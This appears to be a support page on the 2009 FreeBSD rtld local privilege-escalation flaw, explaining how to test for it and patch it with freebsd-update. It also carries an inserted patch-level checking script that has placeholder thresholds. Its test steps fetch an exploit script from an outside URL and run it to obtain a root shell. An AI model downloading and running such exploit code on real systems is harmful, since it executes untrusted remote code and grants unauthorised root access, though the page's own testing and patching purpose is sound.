Background
On November 30 2009, a security vulnerability was discovered by Nikolaos Rangos (aka Kingcope) in recent FreeBSD releases, exploiting a flaw in the run-time link-editor, rtld. A patch was issued shortly afterwards and updated binaries were announced on December 3 2009 in FreeBSD security announcement FreeBSD-SA-09:16.rtld. This vulnerability is critical in nature, as it allows a local user to gain root access.
Test your system
If you are running 7.0, 7.1, 7.2 or 8.0 and have not applied updates before December 3 2009, your system is vulnerable. Here is how to test:
1. Login to your system as a user:
$ whoami
kevin
2. Make a temporary directory and download the exploit code:
$ mkdir ~/tmp ; cd ~/tmp ; fetch http://www.rootbsd.net/perm/37154.sh
3. Execute the exploit:
$ sh ./37154.sh
4. Now, if you see a "#" prompt, you are root; you can confirm with:
# whoami
5. Exit the root shell before proceeding to the next steps:
# exit
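As an alternative to running the exploit, an administrator can compare the running patch level (as printed by `uname -r`) against the level that carries the fix. The POSIX sh script below is an added example and is not part of the original page; the only threshold it takes from the page is 7.2-RELEASE-p5 (the target of the sample `freebsd-update` output further down), while the levels for 7.0, 7.1 and 8.0 are placeholders to be filled in from the FreeBSD-SA-09:16.rtld advisory. The function names and the sample release strings are constructed for the example.

```shell
#!/bin/sh
# Added example: classify a FreeBSD release string with respect to the
# FreeBSD-SA-09:16.rtld fix. Only the 7.2 threshold (7.2-RELEASE-p5) is
# taken from the page; "?" marks placeholders to look up in the advisory.

# Minimum patch level per release (assumption: 7.2 needs p5, per the page).
min_patch_for() {
    case "$1" in
        7.2) echo 5 ;;
        7.0|7.1|8.0) echo "?" ;;   # placeholder: fill in from FreeBSD-SA-09:16.rtld
        *) echo "" ;;              # release not covered by this table
    esac
}

# "7.2-RELEASE-p3" -> "7.2"  (empty when the string has no X.Y- prefix)
release_of() {
    printf '%s\n' "$1" | sed -n 's/^\([0-9][0-9]*\.[0-9][0-9]*\)-.*/\1/p'
}

# "7.2-RELEASE-p3" -> "3"; a release with no -pN suffix is patch level 0
patch_of() {
    case "$1" in
        *-p[0-9]*) printf '%s\n' "${1##*-p}" ;;
        *) echo 0 ;;
    esac
}

# Prints one word and returns 0 only for "patched":
#   patched     - at or past the fix level for that release
#   vulnerable  - a listed release below the fix level
#   unknown     - placeholder threshold, or not a -RELEASE build (freebsd-update
#                 does not cover STABLE/CURRENT, so this check cannot decide)
#   not-listed  - release not in the table above
rtld_status() {
    case "$1" in
        *-RELEASE*) ;;
        *) echo unknown; return 1 ;;
    esac
    rel=$(release_of "$1")
    pl=$(patch_of "$1")
    min=$(min_patch_for "$rel")
    case "$min" in
        "")  echo not-listed; return 1 ;;
        "?") echo unknown;    return 1 ;;
    esac
    if [ "$pl" -ge "$min" ]; then
        echo patched
        return 0
    fi
    echo vulnerable
    return 1
}

# On a live system: rtld_status "$(uname -r)"
# Constructed sample string below; prints "patched".
rtld_status "7.2-RELEASE-p5"
```

Run the same check again after `freebsd-update install` to confirm the patch level moved past the threshold. The exploit test on the page remains the authoritative answer for builds this table does not cover.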
Update your system
Now, use 'su' to gain root access if you haven't already. Your system can be updated using the freebsd-update utility. First, run:
# freebsd-update fetch
Sample output:
# freebsd-update fetch
Looking up update.FreeBSD.org mirrors... 3 mirrors found.
Fetching metadata signature for 7.2-RELEASE from update4.FreeBSD.org... done.
Fetching metadata index... done.
Inspecting system... done.
Preparing to download files... done.
The following files will be updated as part of updating to 7.2-RELEASE-p5:
/boot/kernel/if_bce.ko
/boot/kernel/if_bce.ko.symbols
/boot/kernel/if_fxp.ko
/boot/kernel/if_fxp.ko.symbols
/boot/kernel/kernel
/boot/kernel/kernel.symbols
/etc/mtree/BSD.var.dist
/lib/libc.so.7
<... truncated ...>
This downloads the updates. Now, to apply them, run:
# freebsd-update install
Sample output:
# freebsd-update install
Installing updates... done.
You can repeat the exploit test to confirm your system is not vulnerable now. If you need any help feel free to open a support ticket.